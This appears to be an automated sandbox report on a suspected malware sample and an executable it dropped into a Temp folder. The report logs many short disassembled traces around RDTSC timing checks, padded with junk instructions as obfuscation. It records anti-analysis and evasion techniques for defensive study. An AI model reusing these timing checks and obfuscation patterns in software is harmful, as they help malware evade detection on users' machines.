Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D30643 second address: 4D20BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, 87h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F87D59A98BFh 0x0000000f xor eax, eax 0x00000011 jmp 00007F8764C14FEAh 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov esi, eax 0x00000023 cmp esi, 00000000h 0x00000026 setne al 0x00000029 xor ebx, ebx 0x0000002b test al, 01h 0x0000002d jne 00007F8764C3B8B7h 0x0000002f jmp 00007F8764C3B9E1h 0x00000034 call 00007F8769861673h 0x00000039 mov edi, edi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F8764C3B8BEh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D20BD8 second address: 4D20BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D20BEE second address: 4D20C09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D20D10 second address: 4D20D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D20D14 second address: 4D20D1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D20D1A second address: 4D20D1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D20D1F second address: 4D30A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, 73h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b and bl, 00000001h 0x0000000e movzx eax, bl 0x00000011 add esp, 28h 0x00000014 pop esi 0x00000015 pop edi 0x00000016 pop ebx 0x00000017 pop ebp 0x00000018 ret 0x00000019 add esp, 04h 0x0000001c mov eax, dword ptr [0010BBB8h+ebx*4] 0x00000023 mov ecx, 15B4E13Fh 0x00000028 xor ecx, dword ptr [0010BBC0h] 0x0000002e add eax, ecx 0x00000030 inc eax 0x00000031 jmp eax 0x00000033 push edi 0x00000034 call 00007F8764C65204h 0x00000039 push ebp 0x0000003a push ebx 0x0000003b push edi 0x0000003c push esi 0x0000003d sub esp, 0000017Ch 0x00000043 mov dword ptr [esp+00000160h], 0010DD20h 0x0000004e mov dword ptr [esp+0000015Ch], 000000D0h 0x00000059 mov dword ptr [esp], 00000000h 0x00000060 mov eax, dword ptr [00109D4Ch] 0x00000065 call eax 0x00000067 mov edi, edi 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c mov di, EEF6h 0x00000070 mov dl, 04h 0x00000072 popad 0x00000073 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D30A29 second address: 4D30A4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D30A4D second address: 4D30A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D30A51 second address: 4D30A64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D30A64 second address: 4D30AAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 6E4540EAh 0x00000008 pushfd 0x00000009 jmp 00007F8764C3B8BBh 0x0000000e or ax, 118Eh 0x00000013 jmp 00007F8764C3B8C9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d pushad 0x0000001e mov ax, dx 0x00000021 mov si, bx 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D30AAA second address: 4D30AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D30AAE second address: 4D30AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D30AB4 second address: 4D30B0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F8765238CCEh 0x00000010 cmp dword ptr [75AF459Ch], 05h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a call 00007F8765238CCDh 0x0000001f pop esi 0x00000020 call 00007F8765238CD1h 0x00000025 pop ecx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D30C93 second address: 4D30C99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40AF6 second address: 4D40B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F8765238CD9h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40B15 second address: 4D40B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8764C3B8BCh 0x00000009 xor al, 00000048h 0x0000000c jmp 00007F8764C3B8BBh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F8764C3B8C8h 0x00000018 or si, 82A8h 0x0000001d jmp 00007F8764C3B8BBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F8764C3B8C5h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40B79 second address: 4D40B7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40B7F second address: 4D40BAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov al, dh 0x0000000e pushfd 0x0000000f jmp 00007F8764C3B8BCh 0x00000014 or ah, 00000068h 0x00000017 jmp 00007F8764C3B8BBh 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40BAA second address: 4D40BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8765238CD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40BC2 second address: 4D40C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov si, di 0x0000000d mov cl, bl 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 jmp 00007F8764C3B8C0h 0x00000017 xchg eax, esi 0x00000018 jmp 00007F8764C3B8C0h 0x0000001d push eax 0x0000001e jmp 00007F8764C3B8BBh 0x00000023 xchg eax, esi 0x00000024 jmp 00007F8764C3B8C6h 0x00000029 mov esi, dword ptr [ebp+0Ch] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F8764C3B8C7h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	RDTSC instruction interceptor: First address: 4D40C34 second address: 4D40C9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov di, A456h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f jmp 00007F8765238CCDh 0x00000014 je 00007F87D5F8642Dh 0x0000001a pushad 0x0000001b push eax 0x0000001c mov ax, dx 0x0000001f pop edx 0x00000020 push esi 0x00000021 pushfd 0x00000022 jmp 00007F8765238CCBh 0x00000027 sbb ah, FFFFFF8Eh 0x0000002a jmp 00007F8765238CD9h 0x0000002f popfd 0x00000030 pop esi 0x00000031 popad 0x00000032 cmp dword ptr [75AF459Ch], 05h 0x00000039 pushad 0x0000003a call 00007F8765238CCDh 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 121F155 second address: 121F16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8764C3B8BBh 0x0000000a js 00007F8764C3B8BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 121F16D second address: 121F18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8765238CD9h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 121F18E second address: 121F1AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F8764C3B8C1h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1235C3A second address: 1235C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1235C3E second address: 1235C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1235D99 second address: 1235D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1236471 second address: 1236489 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8764C3B8BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239778 second address: 123977C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 123977C second address: 12397FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 01AC77DFh 0x00000011 movsx esi, ax 0x00000014 push 00000003h 0x00000016 call 00007F8764C3B8C9h 0x0000001b call 00007F8764C3B8C7h 0x00000020 mov edi, dword ptr [ebp+122D2CBDh] 0x00000026 pop ecx 0x00000027 pop esi 0x00000028 push 00000000h 0x0000002a sub dword ptr [ebp+122D1EB2h], ebx 0x00000030 push 00000003h 0x00000032 and dh, FFFFFF88h 0x00000035 call 00007F8764C3B8B9h 0x0000003a jbe 00007F8764C3B8C0h 0x00000040 push eax 0x00000041 push ecx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12397FF second address: 1239811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239811 second address: 1239828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8764C3B8BDh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239828 second address: 1239862 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007F8765238CC6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007F8765238CCCh 0x00000015 pop eax 0x00000016 xor dword ptr [ebp+122D2A21h], esi 0x0000001c lea ebx, dword ptr [ebp+1245D5C1h] 0x00000022 mov ecx, edi 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 je 00007F8765238CCCh 0x0000002d jo 00007F8765238CC6h 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239862 second address: 1239867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12398CB second address: 12398CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12398CF second address: 12398D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12398D5 second address: 1239945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8765238CD3h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edi 0x00000010 jp 00007F8765238CC6h 0x00000016 pop edi 0x00000017 pop eax 0x00000018 nop 0x00000019 mov ecx, dword ptr [ebp+122D2E75h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push edi 0x00000024 call 00007F8765238CC8h 0x00000029 pop edi 0x0000002a mov dword ptr [esp+04h], edi 0x0000002e add dword ptr [esp+04h], 0000001Ah 0x00000036 inc edi 0x00000037 push edi 0x00000038 ret 0x00000039 pop edi 0x0000003a ret 0x0000003b sbb dh, 0000007Dh 0x0000003e push D8A5C324h 0x00000043 push eax 0x00000044 push edx 0x00000045 push ebx 0x00000046 jmp 00007F8765238CD3h 0x0000004b pop ebx 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239945 second address: 1239955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8764C3B8BCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239955 second address: 12399F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 275A3D5Ch 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F8765238CC8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov dword ptr [ebp+1245CD01h], esi 0x0000002f or dword ptr [ebp+122D37DCh], eax 0x00000035 push 00000003h 0x00000037 call 00007F8765238CD4h 0x0000003c and ecx, 58C1FAC2h 0x00000042 pop edi 0x00000043 push 00000000h 0x00000045 mov cx, di 0x00000048 push 00000003h 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F8765238CC8h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 0000001Dh 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 jns 00007F8765238CCCh 0x0000006a call 00007F8765238CC9h 0x0000006f push edi 0x00000070 jl 00007F8765238CCCh 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 12399F7 second address: 1239A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8764C3B8C8h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239A19 second address: 1239A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239A1D second address: 1239A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239A23 second address: 1239A51 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8765238CC8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edi 0x00000011 push edi 0x00000012 jmp 00007F8765238CD2h 0x00000017 pop edi 0x00000018 pop edi 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e push eax 0x0000001f pop eax 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239A51 second address: 1239A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8764C3B8B6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239A5B second address: 1239A9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d jmp 00007F8765238CCAh 0x00000012 jmp 00007F8765238CCCh 0x00000017 popad 0x00000018 pop eax 0x00000019 mov ecx, dword ptr [ebp+122D2CE9h] 0x0000001f lea ebx, dword ptr [ebp+1245D5CAh] 0x00000025 mov edi, 75C7A2FBh 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push ebx 0x0000002e jne 00007F8765238CC6h 0x00000034 pop ebx 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239A9C second address: 1239AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8764C3B8BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239B1E second address: 1239B23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239B23 second address: 1239B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8764C3B8BFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jg 00007F8764C3B8B6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1239B46 second address: 1239B87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a mov edi, edx 0x0000000c pop ecx 0x0000000d jbe 00007F8765238CD0h 0x00000013 jmp 00007F8765238CCAh 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D2AE1h], edi 0x00000020 call 00007F8765238CC9h 0x00000025 jmp 00007F8765238CCAh 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push ebx 0x0000002f pop ebx 0x00000030 push edi 0x00000031 pop edi 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1258C53 second address: 1258C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1258C5B second address: 1258C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 popad 0x00000008 jc 00007F8765238CEAh 0x0000000e jmp 00007F8765238CD6h 0x00000013 pushad 0x00000014 jp 00007F8765238CC6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1258EF7 second address: 1258F0D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F8764C3B8B6h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007F8764C3B8B6h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1259082 second address: 1259086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1259086 second address: 125908C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1259A7B second address: 1259A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1259A7F second address: 1259AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F8764C3B8C1h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1259AB1 second address: 1259AB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1259AB7 second address: 1259ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8764C3B8C5h 0x0000000e push esi 0x0000000f jbe 00007F8764C3B8B6h 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1259ADD second address: 1259AFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8765238CD4h 0x00000007 jnl 00007F8765238CCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1259C41 second address: 1259C60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8764C3B8C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1259C60 second address: 1259C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	RDTSC instruction interceptor: First address: 1218608 second address: 121860E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
